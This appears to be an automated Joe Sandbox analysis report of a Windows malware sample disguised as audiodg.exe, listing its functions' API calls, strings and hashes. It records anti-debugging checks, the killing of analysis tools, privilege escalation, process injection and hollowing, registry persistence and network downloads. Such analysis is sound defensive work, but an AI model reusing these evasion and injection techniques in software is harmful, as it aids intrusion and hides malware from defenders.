Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D396D
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3980
Part of subcall function 00007FF6743D38C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6743D3AA9), ref: 00007FF6743D3995

Part of subcall function 00007FF6743D46E4: CreateFileW.KERNEL32 ref: 00007FF6743D472B

Part of subcall function 00007FF6743D40E4: GetCurrentProcess.KERNEL32 ref: 00007FF6743D414B
Part of subcall function 00007FF6743D40E4: OpenProcessToken.ADVAPI32 ref: 00007FF6743D415E
Part of subcall function 00007FF6743D40E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6743D4186
Part of subcall function 00007FF6743D40E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6743D41B1
Part of subcall function 00007FF6743D40E4: CloseHandle.KERNEL32 ref: 00007FF6743D41BC
Part of subcall function 00007FF6743D40E4: OpenProcess.KERNEL32 ref: 00007FF6743D41D1
Part of subcall function 00007FF6743D40E4: CloseHandle.KERNEL32 ref: 00007FF6743D4249

GetProcessHeap.KERNEL32 ref: 00007FF6743D3037
HeapFree.KERNEL32 ref: 00007FF6743D304A

Strings

chFrWWdQWsLFevUr, xrefs: 00007FF6743D2FDB
.x64, xrefs: 00007FF6743D2FEE

Memory Dump Source

Source File: 00000006.00000002.2170709653.00007FF6743D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6743D0000, based on PE: true

Associated: 00000006.00000002.2170664939.00007FF6743D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170743246.00007FF6743D5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170800792.00007FF6743D7000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170820258.00007FF6743D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2170896691.00007FF6743DA000.00000008.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6743d0000_1DC30FADAFF92643095942.jbxd

Similarity

API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
String ID: .x64$chFrWWdQWsLFevUr
API String ID: 3992431006-2286007224
Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
Instruction ID: 761b9925506715ea6dfc695afe5ab42d2c49c138741a513ae3cacfa060583447
Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
Instruction Fuzzy Hash: 3B11D332A28A82C6F710EB16E8DC3A977A0FB88765FA04135E54DC3665DF3CE1598F40

Analysis Process: audiodg.exePID: 5304, Parent PID: 5340COMMON

Execution Graph

Execution Coverage:	23.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	482
Total number of Limit Nodes:	5

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF7A91B345C Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7A91B321C: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF7A91B346D), ref: 00007FF7A91B3220

ExitProcess.KERNEL32 ref: 00007FF7A91B3476
ExitProcess.KERNEL32 ref: 00007FF7A91B34D4

Strings

audiodg.exe, xrefs: 00007FF7A91B354C
worker_FDhvwc, xrefs: 00007FF7A91B35CD
worker_BAccdq, xrefs: 00007FF7A91B3510
worker_RdDwvE, xrefs: 00007FF7A91B34BF
msiexec.exe, xrefs: 00007FF7A91B34FB
svchost.exe, xrefs: 00007FF7A91B3497
worker_kBEqZh, xrefs: 00007FF7A91B3561

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: ExitProcess$DebuggerPresent
String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
API String ID: 613740775-1953711635
Opcode ID: 31553c019a40e59f8029305eb783abe107710fc58d50c27d998bbdd7f76d6dd3
Instruction ID: 0b4550e609804ef1ace19be7832b13da796b37b85031e74260f08a93080f3134
Opcode Fuzzy Hash: 31553c019a40e59f8029305eb783abe107710fc58d50c27d998bbdd7f76d6dd3
Instruction Fuzzy Hash: 6C61FC20A1FA5391EA66BF31F85527AA2B2EF84740FC64135E44EC65F5CE2DE5368230

Function 00007FF7A91B4264 Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3481), ref: 00007FF7A91B4268
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3481), ref: 00007FF7A91B427B
GetTokenInformation.KERNELBASE ref: 00007FF7A91B42AC
GetTokenInformation.KERNELBASE ref: 00007FF7A91B42DE
CloseHandle.KERNEL32 ref: 00007FF7A91B42ED

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: Token$InformationProcess$CloseCurrentHandleOpen
String ID:
API String ID: 434396405-0
Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction ID: a1c2eca8567d78a82139ea56b01fe9258f5495b3706dbf2a7889c24ecce09da9
Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
Instruction Fuzzy Hash: AF31F23261AA8186E751AF15F45062EF7B1FBC8780F515135FA8A83BB8DF3CD4518B10

Function 00007FF7A91B321C Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00007FF7A91B346D), ref: 00007FF7A91B3220
GetCurrentProcess.KERNEL32 ref: 00007FF7A91B3236
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF7A91B3244

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: DebuggerPresent$CheckCurrentProcessRemote
String ID:
API String ID: 3920101602-0
Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction ID: 8994e95279a1ed2ccac00062e453188f2513c28bc1deeb091bb1e7f6f6d24472
Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
Instruction Fuzzy Hash: F7F03010A0F24281E6326F55F40436DA7F1EF45B44F8101B4E58D855B4CF2CD636DB21

Function 00007FF7A91B43A4 Relevance: 4.5, APIs: 3, Instructions: 21
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNELBASE ref: 00007FF7A91B43B9
GetLastError.KERNEL32 ref: 00007FF7A91B43D0
CloseHandle.KERNEL32 ref: 00007FF7A91B43E2

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID:
API String ID: 4294037311-0
Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
Instruction ID: 0a7064d09bd3fc69b52496ff9b647eef24976861ffdad95a9ddd74a9f95120c8
Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
Instruction Fuzzy Hash: 15F03025B0E651D2EA216F20F44537DA3B1FB95700F954435D98EC2AB4CF2DD9299620

Function 00007FF7A91B1050 Relevance: 3.0, APIs: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00007FF7A91B1063
GetProcAddress.KERNEL32 ref: 00007FF7A91B1078

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction ID: 9edf9f7fbe465b6f84d3465e37a1411f2084efac07466daff958b158677f4252
Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
Instruction Fuzzy Hash: 23E09276509F8086CA20AF15F84001AB7B4FBC9794F904225EACD82B38DF3CC165CB00

Function 00007FF7A91B3B24 Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE ref: 00007FF7A91B3B42

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction ID: 74a2e36950f8e299ce9892203c61c3ebca8bfa78e19ac58bbe518265a6878e57
Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
Instruction Fuzzy Hash: B7D01311E3594181E755AF16F445715D3B1FBC4744FC08035E58981574CF3CD0B58F10

Non-executed Functions

Function 00007FF7A91B2048 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00007FF7A91B20AD

Strings

NtUnmapViewOfSection, xrefs: 00007FF7A91B23AE
.reloc, xrefs: 00007FF7A91B264F
@, xrefs: 00007FF7A91B2429
ntdll, xrefs: 00007FF7A91B2399

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: FileModuleName
String ID: .reloc$@$NtUnmapViewOfSection$ntdll
API String ID: 514040917-3001742581
Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction ID: dc5f13bdc9212b6b0fe7a79189c8ef7b10761548cafd4398b57341666d079bdd
Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
Instruction Fuzzy Hash: 0332E732609AC186E772DF15F8547AAA3B2FB98B80F414535DA8E83B68DF3CD454CB10

Function 00007FF7A91B40E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7A91B414B
OpenProcessToken.ADVAPI32 ref: 00007FF7A91B415E
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7A91B4186
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7A91B41B1
CloseHandle.KERNEL32 ref: 00007FF7A91B41BC
OpenProcess.KERNEL32 ref: 00007FF7A91B41D1
WaitForSingleObject.KERNEL32 ref: 00007FF7A91B422C
CloseHandle.KERNEL32 ref: 00007FF7A91B4249

Strings

SeDebugPrivilege, xrefs: 00007FF7A91B417D

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
String ID: SeDebugPrivilege
API String ID: 2379135442-2896544425
Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction ID: 87a06f4f470b3f46ef5ab7b575e95d6d78648ed0744eb19a22ee51115dd25a02
Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
Instruction Fuzzy Hash: 9B416D3261DA8186E351EF55F44832EF7B1FB84754F918034EA8A86AA8CF7DD458CF10

Function 00007FF7A91B2CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32 ref: 00007FF7A91B2D6F
WriteProcessMemory.KERNEL32 ref: 00007FF7A91B2DC1
VirtualProtectEx.KERNEL32 ref: 00007FF7A91B2DF7

Strings

@, xrefs: 00007FF7A91B2D54

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: Virtual$AllocMemoryProcessProtectWrite
String ID: @
API String ID: 4073123320-2766056989
Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction ID: ba24ea550f3a24acaccd85e293da3e45907fdd6a8fcc5c396d5574c61a4708af
Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
Instruction Fuzzy Hash: E2410032609A8586E7719F15F44436BB7B1F794B88F504429EA8C83B68CF7DD4588B40

Function 00007FF7A91B1CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138
networksleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET ref: 00007FF7A91B1D20
Sleep.KERNEL32 ref: 00007FF7A91B1D38
InternetOpenUrlW.WININET ref: 00007FF7A91B1D64
InternetOpenUrlW.WININET ref: 00007FF7A91B1D9B
InternetCloseHandle.WININET ref: 00007FF7A91B1DB3
Sleep.KERNEL32 ref: 00007FF7A91B1DBE
HttpQueryInfoA.WININET ref: 00007FF7A91B1DEE
InternetCloseHandle.WININET ref: 00007FF7A91B1DFD
InternetCloseHandle.WININET ref: 00007FF7A91B1E08
Sleep.KERNEL32 ref: 00007FF7A91B1E13
InternetCloseHandle.WININET ref: 00007FF7A91B1E2D
InternetOpenUrlW.WININET ref: 00007FF7A91B1E57
InternetCloseHandle.WININET ref: 00007FF7A91B1E6F
Sleep.KERNEL32 ref: 00007FF7A91B1E7A
HttpQueryInfoA.WININET ref: 00007FF7A91B1EB2
GetProcessHeap.KERNEL32 ref: 00007FF7A91B1EC1
RtlAllocateHeap.NTDLL ref: 00007FF7A91B1ED7
InternetCloseHandle.WININET ref: 00007FF7A91B1EEF
InternetCloseHandle.WININET ref: 00007FF7A91B1EFA
InternetReadFile.WININET ref: 00007FF7A91B1F37
InternetCloseHandle.WININET ref: 00007FF7A91B1F6D
InternetCloseHandle.WININET ref: 00007FF7A91B1F78

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7A91B1D19

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
API String ID: 2307068205-2771526726
Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction ID: e219a3160157b1090b1d65c3f7cc9d5a7552111c0384420d9c980f8dc31385ae
Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
Instruction Fuzzy Hash: 7071F532619A8182E761AF50F49832AF7B1FBC4794F911035FA8E83A68CF7CD4548B20

Function 00007FF7A91B46E4 Relevance: 25.7, APIs: 17, Instructions: 155
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00007FF7A91B472B
GetFileSize.KERNEL32 ref: 00007FF7A91B474C
GetProcessHeap.KERNEL32 ref: 00007FF7A91B4762
RtlAllocateHeap.NTDLL ref: 00007FF7A91B477B
CloseHandle.KERNEL32 ref: 00007FF7A91B4793

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: FileHeap$AllocateCloseCreateHandleProcessSize
String ID:
API String ID: 2693768547-0
Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction ID: 9785da413cab7a7eab783ed41d9a581bd7575bd7e9e164ebfcb03b44d52b1283
Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
Instruction Fuzzy Hash: 43810932609B8182EA51DF59F48436AE7B1FBC8B90F514135EA8D83B78DF3CD4548B10

Function 00007FF7A91B30DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7A91B45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B460C
Part of subcall function 00007FF7A91B45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B4649
Part of subcall function 00007FF7A91B45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B4654

Part of subcall function 00007FF7A91B3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B311C), ref: 00007FF7A91B3BC7
Part of subcall function 00007FF7A91B3B84: RegSetValueExW.ADVAPI32 ref: 00007FF7A91B3BFD
Part of subcall function 00007FF7A91B3B84: RegCloseKey.ADVAPI32 ref: 00007FF7A91B3C0C

Part of subcall function 00007FF7A91B3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7A91B3C3C

Part of subcall function 00007FF7A91B3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A91B3E37

Part of subcall function 00007FF7A91B3E24: Process32FirstW.KERNEL32 ref: 00007FF7A91B3E6A
Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3E7C

Part of subcall function 00007FF7A91B3E24: wcscmp.MSVCRT ref: 00007FF7A91B3E91
Part of subcall function 00007FF7A91B3E24: OpenProcess.KERNEL32 ref: 00007FF7A91B3EA7
Part of subcall function 00007FF7A91B3E24: TerminateProcess.KERNEL32 ref: 00007FF7A91B3ECA
Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3ED8
Part of subcall function 00007FF7A91B3E24: Process32NextW.KERNEL32 ref: 00007FF7A91B3EEB
Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3EFD

Part of subcall function 00007FF7A91B39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7A91B3B0C), ref: 00007FF7A91B39E4

Sleep.KERNEL32 ref: 00007FF7A91B31C6

Strings

idaq.exe, xrefs: 00007FF7A91B318A
x64dbg.exe, xrefs: 00007FF7A91B3172
Services, xrefs: 00007FF7A91B31B5
idaq64.exe, xrefs: 00007FF7A91B317E
procexp.exe, xrefs: 00007FF7A91B314E
procmon.exe, xrefs: 00007FF7A91B31A2
procexp64.exe, xrefs: 00007FF7A91B315A
TOTALCMD.exe, xrefs: 00007FF7A91B3166
autoruns.exe, xrefs: 00007FF7A91B3196
ProcessHacker.exe, xrefs: 00007FF7A91B3142

Memory Dump Source

Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true

Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd

Similarity

API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
API String ID: 2853470409-928700279
Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction ID: 97efc93cd10e2b7a864ad5ded3685053dadfc50649636a99c597bbae0abb289c
Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
Instruction Fuzzy Hash: C9218820A5B94294EA07FF20FD511B8E2B2EF60750FC20532E41DC25F6DE2CE93A8630

Function 00007FF7A91B38C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7A91B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
Part of subcall function 00007FF7A91B3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
Part of subcall function 00007FF7A91B3744: wsprintfW.USER32 ref: 00007FF7A91B38A2

